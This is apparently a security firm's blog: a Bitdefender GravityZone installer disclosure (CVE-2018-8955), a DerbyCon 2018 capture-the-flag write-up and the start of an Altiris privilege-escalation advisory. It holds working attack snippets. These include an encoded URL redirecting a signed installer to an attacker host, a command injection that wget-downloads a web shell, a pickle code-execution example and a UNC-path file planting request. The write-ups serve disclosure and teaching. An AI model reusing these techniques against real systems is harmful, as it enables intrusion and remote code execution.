CVE-2018-8955: Bitdefender GravityZone Arbitrary Code Execution

We recently identified a vulnerability in the digitally signed Bitdefender GravityZone installer. The vulnerability allows an attacker to execute malicious code without breaking the original digital signature, and without embedding anything malicious into the installer itself. This means that an appropriately positioned attacker can cause the signed installer to run an arbitrary remotely hosted executable.

We consider this to be a vulnerability worthy of analysis because of the way that it works. It is a good example of how developer creativity can bypass otherwise robust security controls.

You can base64 but you can’t hide

Earlier this year, we noticed a tweet about some AV comparison results that prompted us to download an evaluation copy of the Bitdefender GravityZone installer.

The installation is done via a digitally signed executable of about 3.4 MB. We downloaded the installer in a VM, verified the digital signatures, and then noticed an eye-catching file name that caused us to pause. The filename was of the following format:

  • setupdownloader_[base64_string].exe

That was slightly odd, so we decided to find out what that base64 string was used for.  The actual filename of the executable was:

  • setupdownloader_[aHR0cHM6Ly9jbG91ZGd6LWVjcy5ncmF2aXR5em9uZS5iaXRkZWZlbmRlci5jb20vUGFja2FnZXMvQlNUV0lOLzAvXzlKWkJNL2luc3RhbGxlci54bWw-bGFuZz1lbi1VUw==].exe

The base64 string decoded to:

  • https://cloudgz-ecs.gravityzone.bitdefender.com/Packages/BSTWIN/0/_9JZBM/installer.xml\xFFlang=en-US

Digging deeper

This was a URL to an XML file, which was interesting enough to prompt us to dig a little deeper. What would happen if we replaced the base64 string with one that points to an XML file controlled by us?

We changed the filename to:

  • setupdownloader_[aHR0cDovL3RoaXNjYW50YmV0cnVlLmNvbS9pbnN0YWxsZXIueG1s].exe

The base64 in that filename was modified to contain the URL:

  • http://thiscantbetrue.com/installer.xml
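
Generating a replacement filename takes only a couple of lines; the sketch below shows the idea (the URL-safe base64 alphabet is an assumption based on the characters we observed in the original filename):

    import base64

    # Minimal sketch: we assume the installer expects URL-safe base64, which is
    # what the '-' and '_' characters in the original filename suggest.
    url = b"http://thiscantbetrue.com/installer.xml"
    encoded = base64.urlsafe_b64encode(url).decode()
    print("setupdownloader_[%s].exe" % encoded)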

We reran the installer and the results are shown below.

As you can see, the executable was attempting to download the XML file from our own domain. At this point, we downloaded the original XML file and examined its contents.

Within the original XML file, we identified the following interesting looking section:

We replaced that entry with:

We then copied the modified XML file over to our HTTP server.

What we had at that point was the signed GravityZone installer that now contained a URL in base64 that in turn pointed to an XML file under our control. The modified XML file had a new downloadUrl entry which pointed to our HTTP server.

Going one step further

We ran the installer again, this time with the modified base64 string and subsequently modified XML file. That gave us the following error message:

We consequently fired up Wireshark and found the HTTP request that was giving us problems:

We were missing an extra sub-directory named win32, and on top of that we noticed that the setup was looking for another XML file, which we didn’t yet have. Note that our guest OS was 32-bit, and for that reason the installer was looking for the 32-bit modules on the remote server.

We had to identify the structure and contents of the data.xml file that the setup was looking for, and the easiest way to find that out was to allow it to contact the original server.

At this point, we used a simple trick to avoid having to deal with encrypted traffic over HTTPS: we restored the original download URL in installer.xml, but changed the scheme from HTTPS to HTTP.

Consequently, we obtained the contents of the data.xml file by locating the relevant HTTP request:

Of course, you could also just download that file by using your web browser. 🙂

Putting everything together

The data.xml file contained a list of the files that would be downloaded. The following image shows a few of them.

The file ended with the final command to be executed, which essentially instructed the setup application to execute one of the downloaded files called “Installer.exe”: <run_command params="" proc="Installer.exe" />

As you can see, the setup application blindly trusted the installer.xml file and subsequently the information provided by the downloaded data.xml file.

In other words, we could change that list and the setup application would download and execute a file of our choice, as long as we also provided the correct MD5 hash for it, which of course was not an issue.
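
For completeness, producing the hash that the setup expects is trivial; something along these lines, where the payload filename is of course a placeholder:

    import hashlib

    # "payload.exe" is a placeholder for whatever executable an attacker would
    # add to the modified data.xml entry.
    with open("payload.exe", "rb") as f:
        print(hashlib.md5(f.read()).hexdigest())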

To make things worse, an attacker could set up a server with all the legitimate files and just add an extra executable and/or DLL module to the list. This would allow the installation to progress as expected, while silently performing malicious activity on the target system.

Conclusion

We believe that there is a lot that developers can learn from this vulnerability:

  • You must never blindly trust a binary just because it is digitally signed.
  • Even robust security measures can be compromised by subsequent poor implementation decisions.
  • A digital signature can ensure that a file has not been tampered with, but this does not include the filename.

As remediation for this vulnerability, Bitdefender released new, patched installers and revoked the affected certificates.

Disclosure Timeline

Bitdefender were very responsive throughout the disclosure process. A timeline of key dates is as follows:

  • Date of discovery: 18 March 2018
  • Bitdefender informed: 19 March 2018
  • Bitdefender acknowledged vulnerability: 20 March 2018
  • Bitdefender marked the vulnerability as severe: 29 March 2018
  • Bitdefender requested extra time to address certificates revocation: 12 April 2018
  • Public Disclosure: 16 October 2018

DerbyCon 2018 CTF Write Up

We have just returned from the always amazing DerbyCon 2018 conference. We competed in the 48 hour Capture the Flag competition under our usual team name of “Spicy Weasel” and are pleased to announce that, for the second year in a row, we finished in first place out of 175 teams and netted another black badge.

We’d like to say a big thank you to the organizers of both the conference and the CTF competition, as well as the other competitors who truly kept us on our toes for the entire 48 hours!

As in previous years (2016, 2017), we’ve written up an analysis of a small number of the challenges we faced.

Susan

This box took us far too long to get an initial foothold on, but once we gained access the rest came tumbling down quite easily. It was only running two services, as detailed below. Our team spent some time on this box with limited success. The mail service allowed us to enumerate users via the VRFY command, confirming susan as a user on the system, and also to send email. Some time was spent using the mail service to send email internally, with no useful result.

Extensive brute forcing of the SSH service was carried out by multiple members of the team over the course of the CTF, with no success.

Susan’s password was eventually recovered, although not through the simple and presumably intended method of brute forcing. We’ll be kind to ourselves and say it was potentially due to network stability issues, since the credential pair that eventually proved correct had been passed to the server during multiple earlier brute force attempts.

We will come back to Susan later in this post…

Elastihax

There were a number of easy to grab flags that could be retrieved from this box by using dirb to identify a few hidden directories. However, the main part of this box was a site running Elasticsearch.

Our team identified a known vulnerability in the installed version of Elasticsearch (API version 1.1.1) which allows for remote code execution. The exploit for this is included in the Metasploit framework by default:

The operating system was identified as Ubuntu 9.10, running a version of the Linux kernel vulnerable to a number of kernel level exploits (2.6.31-14).

Our team decided to utilise Dirty COW, using an exploit variant that adds an account named firefart with root access.

It was then possible to log into the server using the firefart account:

There were many flags on this box, one of which was the password of the davekennedy account. Unfortunately, this was one that escaped us due to its discovery in the later part of the CTF and the complexity of the underlying password.

Reviewing the box revealed a number of flags; however, of greater use was an SSH key inside the home directory of the user susan.

Susan Continued

Using the discovered SSH key for the user susan, it was possible to gain access to the box Susan.

The box was a trove of flags in many locations, as demonstrated above. Other locations included grub.config and authorised key files. One of the more fun flags was saved in the user’s home directory at Pictures/Wallpapers/Untitled.png, which we retrieved from the box. VNC was running on localhost and we saw a number of people port forwarding through the box to reach it, but we just downloaded the file.

X64 binaries

There were a number of x86, x64 and arm binaries of varying difficulties. We captured the flag from most of these and have opted to show a run through of the x64 series.

Simple (File name: x64.simple.binary)

As expected from the file name, this challenge was very simple. It was a Mach-O 64-bit binary, and when executed it asked the user for a key to continue.

We could see that the user’s input was passed to the _AttemptAuthentication() function as an argument. Looking at that function, we could see that its argument was compared (using strcmp) to aolOneBar@Bill.io – the flag for this challenge.

It is worth noting that there were a significant number of hardcoded red herrings, trying to divert someone who was just looking for strings within the binary.

Medium (File name: x64.medium.binary)

Once again we had a Mach-O 64-bit binary. Similarly to the previous binary, the user was prompted to enter a key when the binary was executed. This time, it looked like things were a bit more complex than a simple strcmp():

Looking a bit deeper into the assembly, it would seem that the user’s input was compared to a reference string (which looked like a mangled email address) in the following fashion (a rough Python model follows the list):

  1. Start with the last character of the input string, compare with the first character of the reference string;
  2. Skip backwards 13 characters in the input string, compare with next character of the reference string;
  3. Repeat step 2 until you cannot go further back;
  4. Move the starting point one character back (from last to penultimate), compare with next character of the reference string;
  5. Repeat from step 2, until all 13 possible non-overlapping starting points have been covered.
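
As promised, here is that rough model of the comparison loop; the stride of 13 comes from the assembly described above, while the function name and termination details are our own reconstruction:

    def matches_reference(user_input, reference):
        ref = iter(reference)
        for offset in range(13):                   # 13 starting points, beginning at the last character
            i = len(user_input) - 1 - offset
            while i >= 0:
                expected = next(ref, None)
                if expected is None:               # reference exhausted: every character matched
                    return True
                if user_input[i] != expected:
                    return False
                i -= 13                            # skip backwards 13 characters
        return next(ref, None) is None             # input exhausted: match only if reference is too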

Knowing that comparison algorithm, one could reverse it until this challenge’s flag was identified. However, under the pressure of the CTF we opted for a less elegant but quicker and easier way of solving this challenge.

As with the previous challenge, a large number of red herring flags could be found in the file:

It was a reasonable assumption that one of these red herrings would be the valid flag.

With a few lines of Python, we took the list of red herrings, and computed which one(s) could be written using only the characters from the reference string. As it turned out, only one of them matched that condition:

  • microsoftaolmicrosoftaolFredBobNetlive@TED.io

This was the flag for this challenge.
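
The few lines of Python in question boiled down to a character-set check along these lines (the reference string and the candidate list are placeholders for the values pulled from the binary):

    reference = "<mangled email-like string from the binary>"   # placeholder
    candidates = [
        "<red herring 1>",                                       # placeholders for the strings
        "<red herring 2>",                                       # dumped from the binary
    ]

    allowed = set(reference)
    hits = [c for c in candidates if set(c) <= allowed]
    print(hits)    # only one candidate survived this filter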

It should be noted that the first character of the user input was not considered when comparing to the reference string. This is why the flag has two m characters, but the reference string contains only one.

Hard (File name: x64.hard.binary)

For the hardest of the x64 binary challenges, we were given two files. One represented a custom filesystem image, and the other was a tool that could read from and write to the given custom filesystem image. This fictional filesystem took the name of DedotatedWamFS. Here’s a screenshot of the tool’s functionality.

Reading the filesystem image we were given, we found a hint in one of the files:

It would seem that the flag was in a file in the filesystem image, but the user remembered to delete it (since it wasn’t in any of the other files in the filesystem).

Disassembling the binary, we started by identifying the tool’s core functionality:

Looking at the DELETE sub-routine, we were able to identify that deleted files are marked with a binary flag.

With that in mind, the first thing we needed was the name of the deleted flag file. We looked into the LIST sub-routine, and identified a code section which would only list the file if it had not been deleted, by checking the flag.

We patched that section of the binary, so that the tool wouldn’t check whether the file was deleted or not.

We had found the deleted file – flag.txt. We proceeded to look into the READ sub-routine; once again we identified a simple check to confirm whether the file was deleted or not. We patched that section of the code out and could then read the file.

It looked like the deleted flag.txt file was encoded or encrypted. We went a bit further disassembling the executable, into a sub-routine we identified as WRITE.

It seemed like the file was encoded using a rotating single-byte XOR key. Every byte of the file was XOR’ed with a byte key, which was then incremented by 0x07. The original XOR byte key could not be recovered through reverse engineering alone, because it was based on a random value.

However, since it was a single byte, we could simply brute force the 256 possible values. We wrote a few lines of Python for this. The flag file contents we recovered were:

  • superkai64@minecraft.net
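
For reference, the brute force amounted to something like the following sketch; the input filename and the printable-text filter are our own assumptions:

    data = open("flag.txt.raw", "rb").read()    # hypothetical dump of the deleted file's raw bytes

    for start_key in range(256):                # brute force the initial single-byte key
        key, out = start_key, bytearray()
        for b in data:
            out.append(b ^ key)
            key = (key + 0x07) & 0xFF           # the key rotates by 0x07 per byte, as seen in WRITE
        if all(32 <= c < 127 for c in out):     # keep only fully printable candidates
            print(start_key, out.decode())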

Jenkins

There were two services available: SSH and a web server.

Browsing to the website on port 8080 presented a Jenkins portal that allowed for self-registration.

Jenkins is open source software written in Java that has a known exploitation path via the Script Console. As described on the Jenkins web site: “Jenkins features a nice Groovy script console which allows one to run arbitrary Groovy scripts within the Jenkins master runtime or in the runtime on agents.” While Jenkins now offers protections to limit access from non-administrators, the installed version did not offer those protections.

We registered for an account, which allowed for access to the “Manage Jenkins” features and the Script Console.

We then used one of the reverse shells belonging to pentestmonkey:

It was possible to gain a reverse shell running in the context of the user Jenkins on this system.

From that shell, it was possible to gain a full TTY session by using the python3 installation on the host. This allowed access to a few of the five flags on this host.
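
The TTY upgrade was the usual Python pty trick, along the lines of:

    python3 -c 'import pty; pty.spawn("/bin/bash")'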

Access to a root shell was gained by breaking out of the less program. Within the sudoers file, the Jenkins user was defined as having the ability to run less against the syslog file without requiring a password. Once a root shell was obtained, the CTF user’s password was recovered from the .bash_history file. That user was defined within the sudoers file as having full root permissions, and the account allowed us to access the SSH service directly, bypassing Jenkins, and to gain the rest of the flags on the host.

osCommerce

We discovered that default installation pages for the osCommerce application were accessible.

This was particularly interesting as publicly available exploits exist, which can be executed by an unauthenticated user, resulting in code execution on the underlying server.

Our actions were fairly limited because we were executing commands in the context of the www-data user. As such, the next step was to compile, upload and execute a kernel-based privilege escalation exploit (CVE-2016-4557) for more meaningful access.

Executing the exploit provided us with a root shell, and the ability to read files without restriction.

After scooping up most of the file-based flags, the next step was to compromise the MySQL database of the application. We found credentials for the debian-sys-maint user and used these to log into the MySQL database.

Displaying the contents of the administrators table provided us with access to the final flag on osCommerce.

Quiz System

Based on the directory structure, file names and application name, we were relatively confident that the source code of Quiz System was publicly available at this link:

After downloading the application, we began to search for SQL injection vulnerabilities which would result in access to the underlying system.

The /admin/ajx-addcategory.php file had a parameter called catname which was vulnerable to SQL injection attacks.

We created the following request file and fed it into sqlmap. This resulted in code execution on the underlying server in the context of the www-data user.

sqlmap creates a file upload stager when the --os-shell flag is used. This was particularly useful, as it allowed us to upload a PHP payload which provided us with a shell on the underlying system.

After inspecting the /etc/passwd file, we identified that there were two users of interest, quiz and root. Both users shared the same password, which we fortuitously guessed to obtain root access and access all file-based flags.

WordPress

Facepalm update: The DerbyCon CTF team got in touch with us and let us know that while the attack path described here is valid, it was not the intended path. Apparently there was a WordPress username – djohnston – embedded in the HTML comments somewhere, and that user had a password of Password1 for wp-admin. Certain members of our team maintain they attempted this with no success but… *cough* 🙂

This challenge included a WordPress based blog – the EquiHax Blog.

There was an XXE flaw which allowed us to view the contents of server-status because it was available to localhost.  Through that, we found a file named dir.txt which was accessible under the wp-admin directory. This file provided a listing of all files in this directory.

Interestingly, the 050416_backup.php file was originally intended to be named pingtest.php.

The purpose of this file was to feed an IP or domain argument, via the host parameter, into /bin/ping. As this file executed system commands, we were able to add a semi-colon to end the ping command and issue commands of our choice. Consequently, we spun up a temporary web server and hosted a password-protected web shell. This was then downloaded to the WordPress server by using wget.
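
A hypothetical reconstruction of that request in Python looks something like this; only the host parameter, the script name and the use of wget come from the attack described above, the rest is placeholder:

    import requests

    # Hypothetical reconstruction of the command injection request; hostnames
    # and file paths are placeholders.
    target = "http://<wordpress-host>/wp-admin/050416_backup.php"
    payload = "127.0.0.1; wget http://<our-server>/shell.php -O shell.php"
    requests.get(target, params={"host": payload})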

Having a web shell allowed us to execute further commands, as well as upload and download files. We leveraged the existing python3 interpreter on the WordPress box to obtain a reverse TCP shell in the context of the www-data user. After inspecting the groups for this user, we identified that www-data was part of the sudo group, which enabled us to easily escalate our privileges to root.

After scooping up most of the file-based flags, the next step was to compromise the application’s MySQL database. Credentials for accessing the database were located in the wp-config.php file. Displaying the contents of the administrators table provided us with access to the final flag on WordPress.

Equihax Chat Server

This server hosted two applications: a dd-wrt firewall on port 80 and a custom chat application on port 443. The information presented by the dd-wrt firewall implied that this host bridged the two networks in scope together.

It also had an RDP service available, even though the dd-wrt application implied it was a Linux box.

It was our assumption that the HTTPS and RDP ports were being reverse proxied from host(s) within the second network, but we ran out of time and could not confirm this.

Returning to the custom application, we had the option of logging in using either IdentETC or IdentLDAP. This seemed like a bit of a hint that the application was able to use the credentials from an enterprise authentication system. It might be connected to something bigger.

We guessed the weak credentials and were able to log in (chat/chat) with the IdentETC method.

Once logged in, we found a simple chat interface where you could post a message and subscribe/unsubscribe from the Public channel.

We then identified an interesting looking session cookie. When you first entered your credentials using the IdentETC method, these were POSTed to the /Login page. This set a cookie called session and then triggered a redirect to /Chat. By examining the session cookie, we could see that it was made up of a number of parts, all delimited by a colon.

We decoded the session cookie’s value and obtained the following output.
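
Pulling the cookie apart takes only a couple of lines; a sketch of the sort of decoder we used is shown below (the cookie value itself is obviously a placeholder):

    import base64

    cookie = "<value of the 'session' cookie>"      # placeholder
    for part in cookie.split(":"):                  # the cookie was colon-delimited
        padded = part + "=" * (-len(part) % 4)      # restore any stripped base64 padding
        print(base64.b64decode(padded))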

That was interesting; even though we were using the IdentETC method of authentication, it was actually using the IdentLDAP method behind the scenes to log us in.

Remember the RDP that was open? Well, guess which credentials worked on that!

It quickly became apparent that we were not the only people with these credentials as we were being kicked out from our RDP session on a very regular basis. To ensure we maintained access, we dropped C2 and started to enumerate the machine and the domain.

We noticed that one of the other users to have logged into the device was scott; it turned out that account was part of the domain admins group.

Further investigation also confirmed that this device was located on a network segment inaccessible from the rest of the network (192.168.252.0/24 instead of 192.168.253.0/24).

It was then possible to use our access to this machine to begin to explore the “internal” network range and to begin attacking the domain. After a while (actually a disappointingly long time) we discovered that scott was using his username as a password.

We could then use scott’s credentials and the foothold we’d gained on the chat server to pivot to the domain controller and start hunting for flags. One of the things we did was dump the hashes pulled from the domain controller and feed them into our hash cracking machine.

Within a few minutes we had retrieved 1,372 passwords. We picked one of the passwords at random and submitted it; 2 points.

We therefore likely had a load of low value flags that needed to be submitted, but being the lazy hackers we are, no one was really in the mood to submit 1,372 flags manually; automation to the rescue! We quickly put together a Python script to submit the flags on our behalf, and got back to hacking while the points slowly trickled in.
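
That script was nothing fancy; a rough sketch of the idea is below, with the scoreboard URL, form field and session cookie as placeholders rather than the real endpoints:

    import requests

    # Rough sketch of the submission loop; the scoreboard URL, form field name
    # and session cookie are placeholders, not the real CTF endpoints.
    SUBMIT_URL = "https://<scoreboard>/submit"
    session = requests.Session()
    session.cookies.set("session", "<our scoreboard session cookie>")

    with open("cracked_passwords.txt") as f:
        for flag in (line.strip() for line in f if line.strip()):
            r = session.post(SUBMIT_URL, data={"flag": flag})
            print(flag, r.status_code)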

Chat Server Continued…

What was completely conspicuous by its absence was any form of integrity checking on the session cookie (this should have been implemented through the use of a MAC, utilising some form of strong server-side secret).

We could see that the cookie was the serialized form of a binary object. When the cookie was sent to the server, it was likely deserialized back into a graph of binary objects. The serialized form defines the objects to be instantiated and the values to be copied into them. You can’t send the declaration of an object; only its data. This doesn’t mean it isn’t possible to build a graph that will execute code, though.
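
Python’s pickle module has exactly the same failure mode and makes for a compact illustration of the concept; note that this is a generic example, not the Ruby gadget used against the chat server:

    import os
    import pickle

    class Evil:
        # __reduce__ tells pickle how to rebuild the object; here "rebuilding"
        # is a call to os.system, so deserialising the blob runs the command.
        def __reduce__(self):
            return (os.system, ("id",))

    blob = pickle.dumps(Evil())
    pickle.loads(blob)   # anything that blindly loads attacker-controlled data executes the command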

A fantastic example of this is Gabriel Lawrence and Chris Frohoff’s ysoserial tool for Java. To understand this concept further, we can’t recommend their talk “Marshalling Pickles” enough:

Ruby on Rails has gadgets for RCE via deserialization through ActiveSupport, which we tried, but unfortunately this was not a Rails application. Then…

It didn’t appear to be a User object, though.

Well, it just happened to be assigned in a different location. Once you had logged in, the redirect to /Chat caused a second part of the cookie to be set.

As we can see here, and comparing to the previous session cookie screenshot, the section of the session cookie before the first delimiter had dramatically increased.

The serialized object now contained a Userid and indentToken. Doing some research, we found that these classes are part of the SHIPS (https://github.com/trustedsec/SHIPS) toolkit that TrustedSec has put on GitHub.

One of the gems inside this project is called usa. It contains the definitions for IdentLDAP and IdentETC, along with a very interesting definition called IdentETCNoPass. Despite a bit of time spent on authenticating with that object, no shell was forthcoming – time for a break.

The break involved learning as much as possible about Ruby, looking at some of the other challenges and watching the Offspring, who were awesome.

Coming back to this and thinking about the clue earlier, it was time to try to mock a Ruby object, serialize it and see what happened. To do this we needed a Ruby environment, for which we used https://repl.it – essentially an online code testing environment.

With Ruby serialization, only the name of the object has to match during deserialization; any matching members will be populated with the values passed through. Here we were able to mock the User object completely, then serialize it and encode it in Base64. The payload in both the indentType and identToken here was a string that should execute the ping command:

https://stackoverflow.com/questions/6338908/ruby-difference-between-exec-system-and-x-or-backticks

Here is the serialized and encoded form.

And here are the pings coming back after sending the cookie in:

So where is the flag? Well, unfortunately we only worked this out with 15 minutes of the CTF to go, so despite gaining code execution the flag eluded us. Ah well, it was still a really cool challenge that we had some epic learning from.

OTRS

Having used the Equihax Chat Server to compromise the domain controller and pivot into the internal network, we were faced with some new machines. This was one of them.

In order to find OTRS, we ran various reconnaissance tools post foothold against the internal network of equihax.com. The first was an ARP scan of the network, as shown below. This identified two additional hosts, 192.168.252.10 & 192.168.252.106:

192.168.252.10 was on the inside of the dd-wrt host, which was later revealed not to be exploitable.

After we compromised both Windows hosts within the internal network, we performed a port scan from the domain controller to find out if any additional ports were open. However, it appeared that all ports were available to both hosts on the network.

It was noted that the more stable host was the DC and as such we deployed a SOCKS proxy server from the domain controller (192.168.252.2). The SOCKS proxy allowed us to build a tunnel through the compromised host and funnel all traffic through to the target environment from our own hosts. This feature allowed us to access a number of resources, including connecting remote desktop (RDP) sessions and internal web sites such as OTRS.

The following screenshot shows the homepage of the OTRS software which was identified using lateral movement techniques from the internal domain controller.

After some additional external reconnaissance, it was identified that this software was used as an aid to helpdesk staff for raising tickets internally. Clicking the link shown below led to a login prompt, which was found to accept the easily guessable credentials helpdesk/helpdesk.

Once connected to the OTRS software as a standard user, the following ticket information was available.

After looking inside the tickets, the following hint was given:

“Hey Jim I am still working on getting this helpdesk app setup since management insists we actually have to take care of the darn users now.

I know the password I set was Swordfish but I can’t remember what the administrator account name was. Anyway now that this thing is stood up we might as well use it”

Swordfish was both the password for an administrator-level account on this software and a flag. We still had to identify the default administrator account name, which some research on the Internet revealed to be root@localhost.

We discovered from conducting research against this software (OTRS 6.0.1) that two publicly disclosed vulnerabilities exist in it. One abuses the package manager by uploading a new package, leading to code execution, and the other abuses the PGP key handling, which can also achieve code execution.

Only one of the two appeared to work in this environment (CVE-2017-16921), which affected the PGP key handling. More information on these vulnerabilities can be found here:

The essence of the vulnerability was editing the PGP::Bin setting and its parameters so that OTRS would execute some other binary; in this example we used a simple Python reverse TCP connection.

The payload used was:

Once we had a foothold on the host, we identified it was running as the apache user and privilege escalation was required. The usual escalation techniques were attempted and a SetUID binary that seemed out of place was identified.

Using the foothold, we executed the following commands to extract the hashes:

The -O flag writes the contents of the archive to the screen. However, this didn’t yield a flag on its own – that would have required cracking the root password, which we didn’t manage before the end of the CTF. It did, however, reveal that the user’s password for OTRS was OTRS.

To obtain a full root shell and access the flag, we could have either guessed its location, tar’d the entire root folder, or replaced the /etc/shadow and /etc/passwd files to create a new UID 0 user. We got root access and used PoshC2 to handle our shells, including on this box, as shown below.

There may have been other flags on this host but we ran out of time to find them.

Web Credit Report Dispute Application

This server hosted a custom credit report dispute application. Without authenticating, we were able to create a dispute, but in order to find more of the functionality we needed to be able to log in.

Clicking on the “Create a report” link, we were taken to the “Problem Report form”. As this page was pre-authentication and there was an authenticated section to the application, we immediately started thinking this might be some kind of stored XSS or SQLi. We spent a bit of time fuzzing, which ultimately showed this not to be the case.

Okay then, let’s try and log in.

After a bit of fuzzing on the login form, it turned out that you could log in using the username:password combination of Admin:. Interesting; it looked like there was some kind of injection vulnerability in the password field. We decided we’d roll with it for the moment and see if anything more could be done with it later.

Once we were authenticated, we got to the /viewreports.php page shown below. It contained all of the reports that had been created. Thanks to fellow CTFers’ prodigious use of Burp Suite Active Scan, there were quite a few reports listed. It was also difficult to understand when one was created – something we later found a solution to.

Clicking on any of the links here took you to the /viewreport.php page again, this time detailing all the information that the relevant user had submitted.

Locating a report that we had just created was a little on the hard side; the report that was created appeared to be named using some kind of timestamp. Unfortunately, no ID was returned when you created a report either. The solution is documented a little further down.

The rpt field was found to have a path traversal vulnerability, but by far the most interesting part of the page was the “I have fixed this!” link. Viewing the source of the page and decoding the URL using the Burp shortcut ctrl+shift+u, we could see that the rename.php page took two parameters, old & new, which just happened to take file paths as values.

Our immediate thought was to inject PHP via the create report page, locate it on the view requests page, move it so it had a PHP extension, navigate to it and BOOM code execution.

If only it were that simple; it was indeed possible to change the file extension to PHP, PHP5 or PHPS, however all the fields in the Report Creation page were being escaped on output, exactly as can be seen here with the first name field:

Okay, so how was it possible to easily spot the page that had just been created?

Well, no Spicy Weasel write-up is complete without the use of LinqPad, our favourite C# scratchpad tool (https://linqpad.net). For those interested in beginning .NET development, this is an excellent tool to experiment with.

The idea was to write a script that would retrieve the listing on the viewreports.php page, persist the current entries and then, on every subsequent run, check for any new pages. To persist data between runs, a static class with static container members was created. LinqPad can use a new process per run of the script, which would destroy our static container, so to ensure that the results were persisted between runs the following settings were applied (by right clicking the query and selecting properties).

Who said you can’t parse HTML with a regex? 🙂
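
For anyone without LinqPad to hand, the same idea fits into a few lines of Python – poll the listing page, regex out the report links and diff them against the previous run. Everything in the sketch below (URL, link format, session cookie) is a placeholder; the original was a LinqPad C# script:

    import re
    import time
    import requests

    # Placeholder values throughout: the real listing URL, link format and
    # session cookie differed.
    URL = "http://<target>/viewreports.php"
    seen = set()

    while True:
        html = requests.get(URL, cookies={"PHPSESSID": "<our session>"}).text
        links = set(re.findall(r'viewreport\.php\?rpt=[^"\']+', html))   # yes, regex on HTML
        for new_report in sorted(links - seen):
            print("new report:", new_report)
        seen |= links
        time.sleep(10)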

Checking out the server header, we could see that somewhat unusually for a PHP application, it was hosted on Windows. This suddenly made the rename.php file a lot more interesting.

What if the page can read and write to UNC paths..?

So yes, it turns out UNC paths could be read. The problem, though, was that IIS was running with no network credentials, and modern SMB is designed to make it as difficult as possible to allow connections by hosts with no credentials.

By deliberately weakening the SMB configuration on a virtual machine, it was possible to successfully have a file read by sending the request in the screenshot above. This allowed the uploading of a PHP file that kicked off a PowerShell PoshC2 (https://github.com/nettitude/PoshC2) one-liner, giving us a shell to go searching for the flags.
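
A hypothetical reconstruction of that rename.php request is shown below; the parameter names old and new come from the page source, while the hostnames and paths are placeholders:

    import requests

    # Hypothetical reconstruction of the rename.php request; everything other
    # than the 'old'/'new' parameter names is a placeholder.
    params = {
        "old": r"\\<our-smb-host>\share\shell.php",   # UNC path to our weakened SMB share
        "new": r"C:\inetpub\wwwroot\shell.php",       # guessed location inside the webroot
    }
    requests.get("http://<target>/rename.php", params=params)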

Once we identified that vulnerability in the application, we hosted a PHP file which executed PowerShell on the remote host using PoshC2.

Once we had C2 on this host, we discovered it was running as IUSR, which is a low privileged IIS application user. We attempted various standard privilege escalation checks against the host and concluded it was a Server 2016 box with no trivial escalation vulnerabilities beyond missing patches. EternalBlue (MS17-010) could have been an option, but this is normally unstable against Server 2016 and was probably not the intended exploit for this host.

After further enumeration of the host we identified two more flags on the system using the command below:

This yielded:

  • info.php:2:header('Flag: TheBruteForceIsStrongInThisOne');
  • viewreports.php:19:header('Flag: InjectionHeaders');

We also found a file inside the adminscripts folder that contained a hint suggesting it was run as a scheduled task every five minutes. We added an additional line to execute our PowerShell payload:

This allowed us to obtain administrator level privileges on the host with PoshC2, as shown below. We then extracted the hashes of all users and cracked the password for the administrator user, which was a large flag, and also retrieved a flag from the administrator’s desktop.

It should be noted that all Windows 2016 hosts had Windows Defender enabled, which was blocking malicious PowerShell.

As such, we needed to migrate and inject the PoshC2 shellcode, which employs the AMSI bypass released by @mattifestation:

Equihax License Validator (fu3) – Keygen Project

The Equihax licensing server had one objective – download the application, reverse engineer the .NET assembly, and create a keygen whose output could be submitted back to the original site for verification.

We first identified it was a .NET assembly by running the file command on Linux.

We used ILSpy to decompile the binary, but it generated the following error when trying to decompile the validateLicense function.

We then downloaded the latest version of ILSpy (4.0.0.4319-beta2), which successfully decompiled the code back to C#.

The first section of the code took the user’s first name and MD5 hashed that value. It then took the first eight characters of the resulting hash and used them in the next part of the code. It also had a static string that it used as part of the keygen creation (Kc5775cK).

By using the algorithm in the above code, we could simply create our own StringBuilder string and spit it out using LINQPad. There was also some unnecessary code below this, but we didn’t need that to generate the license. Here’s the code for this project and the generated license key.

The full source code is as follows.

This yielded the flag.

MUD

There was a downright evil box that hosted a MUD, courtesy of @Evil_Mog. With the exception of a couple of simple flags, we were unable to gain any traction here. This tweet says it all…

Conclusion

This year’s DerbyCon was as fun as ever, and we really enjoyed participating in the CTF competition. Hopefully you can find some value in us sharing portions of the competition with you.

We’re always grateful for the opportunity to practise our craft and we recognise the sheer effort required to put on an event like DerbyCon, including the annual DerbyCon CTF. Once we’ve rested up, we’ll be looking forward to next year!

CVE-2018-5240: Symantec Management Agent (Altiris) Privilege Escalation

During a recent red team exercise, we discovered a vulnerability within the latest versions of the Symantec Management Agent (Altiris) that allowed us to escalate our privileges.

Overview

When the Altiris agent performs an inventory scan, e.g. a software inventory scan, the SYSTEM-level service re-applies the permissions on both the NSI and Outbox folders after the scan is completed.

  • C:\Program Files\Altiris\Inventory\Outbox
  • C:\Program Files\Altiris\Inventory\NSI

The permissions applied grant the ‘Everyone’ group full control over both folders, allowing any standard user to replace either folder with a junction to an alternative location. The ‘Everyone’ permission is then placed on the junction’s target, and inheritance pushes it onto every file and folder within that structure.

This allows a low privilege user to elevate their privileges on any endpoint that has Symantec Management Agent v7.6, v8.0 or v8.1 RU7 installed.

Analysis – Discovery

When performing red team engagements, it is common to come across different types of third party endpoint software installed on a host. This type of software is always of interest, as it could be a point of escalation on the host, or potentially across the environment.

One example of endpoint management software we’ve often seen is Altiris by Symantec. This software is an endpoint management framework that allows an organisation to centrally administer their estate to ensure the latest operating system patches are applied, to deliver software, to make configuration changes based on a user’s role or group, and to perform an inventory asset register across the entire estate.

The version tested by Nettitude was 7.6, as shown throughout this write-up; however, Symantec confirmed on 12 June 2018 that all versions prior to the patched release are affected by the same issue.

We noticed that folders within the Altiris file structure had the ‘Everyone – Full Control’ permission applied. These folders seemed to contain fairly benign content, such as scan configuration files and XML files, from what we believed to be the inventory scan or output from a recent task. These folder and file permissions were found using a simple PowerShell one-liner which allowed us to perform an ACL review on any Windows host, using only the tools on that host. An example of this one-liner is as follows:

Get-ChildItem C:\ -Recurse -ErrorAction SilentlyContinue | ForEach-Object {try {Get-Acl -Path $_.FullName | Select-Object pschildname,pspath,accesstostring} catch{}}|Export-Csv C:\temp\acl.csv -NoTypeInformation

(See: https://gist.github.com/benpturner/de818138c9fcf8e1e67368a901d652f4)

When reviewing the timestamps on these folders, it appeared there was activity happening once a day within them. After doing further research into the folders, we concluded that these files were likely modified after a system or software inventory scan. Now, depending on the relevant organisation’s configuration and appetite for inventory management, this may happen more or less often than once per day.

